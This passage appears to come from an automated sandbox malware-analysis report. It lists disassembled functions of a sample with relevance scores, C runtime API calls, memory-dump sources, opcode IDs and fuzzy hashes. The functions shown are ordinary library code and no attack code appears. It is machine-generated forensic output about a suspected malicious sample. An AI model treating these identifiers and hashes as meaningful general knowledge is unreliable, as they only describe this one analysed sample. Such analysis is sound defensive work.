                • Opcode Fuzzy Hash: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                • Instruction Fuzzy Hash: C4F06262858E8882D2029F1CE4003AB7331FB5E788F245316EF8D3A555DB28D5828704
                Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Argument singularity (SIGN), xrefs: 00401C78
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2468659920
                • Opcode ID: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                • Instruction ID: b6e0ecebc6e2091bb6bcdfd9ecb9f8b620cfa756c99f7cd1274eda0ebaf44184
                • Opcode Fuzzy Hash: bfa7157af2bfae74903953b95ccb901f8d552bd3022b870c14073aba30280489
                • Instruction Fuzzy Hash: CBF03062954F8882D202DF2DE4003AB7331FB5EB9DF649316EF8D3A555DB29D5828704
                Function 03881CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • calloc.LIBCMT ref: 03881D6A
                  • Part of subcall function 038ACCC8: _calloc_impl.LIBCMT ref: 038ACCD8
                  • Part of subcall function 038ACCC8: _errno.LIBCMT ref: 038ACCEB
                  • Part of subcall function 038ACCC8: _errno.LIBCMT ref: 038ACCF5
                • free.LIBCMT ref: 03881EF3
                • free.LIBCMT ref: 03881EFD
                • free.LIBCMT ref: 03881F0F
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_calloc_implcalloc
                • String ID:
                • API String ID: 4000150058-0
                • Opcode ID: 28a1bee2ed890e7cf2c8c28a8ac5cd76316822a62f845b1d042dc32352d46813
                • Instruction ID: 01e6eecd6745db0d6d5e3e87ebb513727c386a3d8fe05d10cd9601ff12159a1c
                • Opcode Fuzzy Hash: 28a1bee2ed890e7cf2c8c28a8ac5cd76316822a62f845b1d042dc32352d46813
                • Instruction Fuzzy Hash: 5DC13E37604B858AD760DFA5E88439EB7B4F788B88F14416AEB8D87B18DF38C555CB00
                Function 0349875B Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0349878F
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • free.LIBCMT ref: 034988D6
                • free.LIBCMT ref: 0349893A
                • free.LIBCMT ref: 03498946
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
                • Instruction ID: be7051306e77fd12ab8755a2a5eb186e828777560138e01920cca07c0a1d9f3c
                • Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
                • Instruction Fuzzy Hash: 8D51AF35718A184FEF28FB2D989056E77D5FB89310B140A6FE44BCB245DE34D902868A
                Function 0348DD1F Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _snprintf.LIBCMT ref: 0348DDBC
                  • Part of subcall function 0349C9C3: _errno.LIBCMT ref: 0349C9FA
                  • Part of subcall function 0349C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0349CA05
                • _snprintf.LIBCMT ref: 0348DDD8
                • _snprintf.LIBCMT ref: 0348DE4E
                • _snprintf.LIBCMT ref: 0348DE65
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3442832105-0
                • Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
                • Instruction ID: f9f103160e12827f83139c580a65c8ffd2f344390cfc6c94247e1367e06177db
                • Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
                • Instruction Fuzzy Hash: 5D61C034618B488FEB55FF28D890BAAB7E5FBA9300F10056FD44AC7290DF34D9458B86
                Function 03483747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
                • Instruction ID: 1b3be5e323d9916c052cc794d793175f0ec3089a31d7723f682d8375b39c9d83
                • Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
                • Instruction Fuzzy Hash: 4641EF38618B054FDB5CEF2DD48153EB3E5FB8861070449AFD89BCB246EE20EC468789
                Function 03899314 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 03899348
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • free.LIBCMT ref: 0389948F
                • free.LIBCMT ref: 038994F3
                • free.LIBCMT ref: 038994FF
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$AllocHeap_callnewhmalloc
                • String ID:
                • API String ID: 3531731211-0
                • Opcode ID: 32250396aac46cb3c7f4cfd35d08813239d5f5291beebfd262bb8bbf460cd738
                • Instruction ID: 7ee72509c3e2d892b8ab490d3cf591c936833fa6f0918c63a83e02cb01293805
                • Opcode Fuzzy Hash: 32250396aac46cb3c7f4cfd35d08813239d5f5291beebfd262bb8bbf460cd738
                • Instruction Fuzzy Hash: 0C51033931034986EE18EBAAE45036E6355BB84BC0F4C54EBEA1ADBB54DF79C506C701
                Function 03884300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: 800eff24e48460816e58490102702d178b1ef3e3c2011002697bd4503662d013
                • Instruction ID: cab7ed0905efe037fe05d616d16c22a98e22203897d5f08043f05fed53f12ad0
                • Opcode Fuzzy Hash: 800eff24e48460816e58490102702d178b1ef3e3c2011002697bd4503662d013
                • Instruction Fuzzy Hash: 5741C33330578297DB18EBA7E40066D73A4F784B88F4849A5DE2AC7B04EF34D906C700